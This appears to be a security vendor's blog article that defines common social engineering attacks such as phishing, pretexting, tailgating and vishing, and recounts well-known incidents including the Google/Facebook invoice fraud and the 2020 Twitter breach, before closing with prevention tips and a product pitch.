Social engineering is a lot like home security. Your home may have thousands of locks and deadbolts, guard dogs, alarm systems, floodlights, barbed-wire fences, or armed security personnel.
All of it won’t matter if you trust the person at the gate who claims to be the food delivery guy and let him in without first checking to see if he’s legit; you’ll be exposed to whatever risk he represents.
This is how social engineering works. We explained what social engineering is in a previous article, and this one will expand on famous examples and types.
What Is Social Engineering?
Social engineering is attacking the weakest link, thus, exploiting people to divulge confidential information of an individual or an organization. When criminals target individuals, they usually attempt to trick people into giving them passwords, bank information, or sensitive information.
Alternatively, these attempts also help gain access to personal computers to secretly install malicious software, giving them access to sensitive information.
Social Engineering Types
The human element is the one common thread that runs through all of these social engineering techniques. Cybercriminals understand that exploiting human emotions is the most effective way to steal valuable information. The following are the ten most common types of social engineering attacks:
It is a social engineering attack commonly used to steal users’ personal information such as login credentials, credit card numbers, etc. Phishing occurs when a hacker impersonates a trustworthy entity and persuades a victim to open an email, instant message, or SMS.
Spear phishing is an electronic communication scam that targets a specific person, company, or organization. Cybercriminals may intend to install malware on a targeted user’s computer in addition to stealing data for malicious purposes.
Baiting is a social engineering attack where a scammer will use a false promise to lure a victim into a trap where they will steal personal and financial information or install malware on the system. The attack may take the form of a malicious attachment with a tempting name.
The victims of scareware are bombarded with false alarms and fictitious threats. Users are tricked into believing malware is infecting their system. Therefore, it prompts them to install software that gives the criminal remote access.
Pretexting is a method of fabricating a scenario to persuade victims to reveal information they should not. Pretexting is frequently used against businesses that keep client information, such as banks, credit card companies, utility companies, and the transportation industry.
Quid Pro Quo
A criminal requesting the exchange of sensitive information such as critical data, login credentials, or monetary value in exchange for a service is known as quid pro quo. For example, a computer user may receive a phone call from a criminal posing as a technology expert who offers free IT help or technology upgrades in exchange for login credentials.
“Piggybacking” is another term for it. Through social engineering tactics, an unauthorized person manipulates their way into a restricted or employee-only authorized area. For example, the attacker could pose as a delivery driver or a custodian. Once the employee has opened the door, the attacker asks the employee to hold it open, allowing access to the hacker.
Vishing & Smishing
Smishing, also known as SMS phishing, is a social engineering attack that deceives recipients by sending text messages. On the other hand, Vishing is a criminal phone fraud that involves sending voice messages to victims to obtain personal information or money.
A Water-Holing attack is an attack on a security flaw. The attacker attempts to compromise a specific group of end-users by infecting websites that the group is known to frequent. The objective is to infect a targeted user’s computer and access the target’s workplace network.
It is the process of looking through someone’s or a company’s trash for information to use on a computer network attack. For example, dumpster divers search the victim’s trash for financial statements, medical bills, government records, résumés, and other documents.
Social Engineering Examples
Ask any cybersecurity professional, and they will tell you that the weakest link in the cybersecurity chain is the human who takes someone or a situation at face value. We regularly warn our audience to be alert for social engineering attempts, but while definitions are helpful, humans usually learn best by example.
It’s time to get you one step closer to genuinely understanding the buzzword “social engineering” by hearing stories of ingenious pretexts, social engineering examples, and hacking exercises.
Here are a few infamous instances of social engineering attacks in action.
$100 Million Phishing Scam on Google and Facebook
Evaldas Rimasauskas carried out the world’s most famous (as far as we know) social engineering attack on two of the world’s biggest companies: Facebook and Google. Rimasauskas and his colleagues set up a bogus corporation that appeared to be a computer manufacturer, working with Google and Facebook. Rimsauskas also opened bank accounts in the company’s name.
These scam artists then sent phishing emails to particular Google and Facebook employees, billing them for goods and services that the manufacturer had legitimately provided — but instructing them to pay money into their fraudulent accounts. As a result, Rimasauskas and his associates defrauded the two tech behemoths of over $100 million between 2013 and 2015.
User Credentials Stolen in A Microsoft 365 Phishing Scam
Security researchers at Microsoft 365 discovered a Business Email Compromise (BEC) scam in April 2021 that convinced the recipient to install malicious code on their device.
The target received a blank email with the subject line “price revision.” The email’s attachment looks to be an Excel spreadsheet file (.xlsx). However, that “spreadsheet” was a .html file masquerading as a spreadsheet.
After opening the (disguised).html file, the target moved to a website containing malicious malware. The code displays a pop-up notification on the user’s screen telling them that they have been logged out of Microsoft 365 and encouraging them to re-enter their login credentials.
You’re probably able to guess what occurs next: the user’s credentials went to the crooks via the fraudulent web form. During the pandemic, this type of phishing thrived, relying on human error combined with weak defenses.
Whaling Attack on A Belgian Bank Steals $75 Million
One of the most successful social engineering attacks of all time happened to Crelan, a Belgian bank. Crelan discovered that its CEO had been “whaled” during a routine internal audit; the perpetrators got away with $75 million.
Crelan was a victim of “whaling,” a type of spear-phishing in which cyber criminals target high-ranking executives. Because these large targets have easy access to funds, cybercriminals frequently try to harpoon them.
Vishing Scam Compromises High-Profile Twitter Accounts
In July 2020, due to a vishing scam, Twitter lost control of around 130 accounts, including Joe Biden, Barack Obama, and Kanye West, among the world’s most famous people. The hackers stole some users’ Twitter data, accessed DMs, and sent out Tweets requesting Bitcoin donations. The perpetrator earned around $110,000 in Bitcoin across more than 320 transactions in just a few minutes before Twitter could remove the tweets.
The incident was labeled as a vishing attack by Twitter. The nature of the calls is still unknown, but the criminals duped Twitter employees into disclosing account credentials that gave them access to the compromised accounts. Twitter’s stock dropped 7% in pre-market trading the next day as a result of the scandal.
Microsoft SharePoint Phishing Scam Targets Remote Workers
Another phishing attack was discovered in April 2021, aimed at remote workers who use cloud-based software. The attack began when the target received an email requesting their signature on a document hosted in Microsoft SharePoint, written in the urgent tone preferred by phishing scammers.
Many office workers were familiar with the SharePoint logo and branding. However, the link takes users to a phishing site designed to steal their credentials. Phishing attacks are increasingly focusing on remote collaboration software. According to Microsoft research, nearly half of IT professionals cited the need for new collaboration tools as a significant security vulnerability as they transitioned to working from home.
Prevent Social Engineering Attacks in Your Organization
The social engineering examples show that these attacks are based on the attacker targeting to gain the victim’s trust. Therefore, paying attention to emails is critical, double-check attachments and links, and avoid urgent orders involving money. The one thing that all of these attacks have in common, whether they arrive via email, text, or voicemail, is that they’re challenging to detect.
This is where Right-Hand Cybersecurity comes in. We help you analyze and learn the organization’s email data, protecting employees from inbound email security threats such as whaling, spear phishing, and other targeted social engineering attacks using AI and machine learning.
Book a demo today to learn more about how Right-Hand can protect your people and data from social engineering attacks.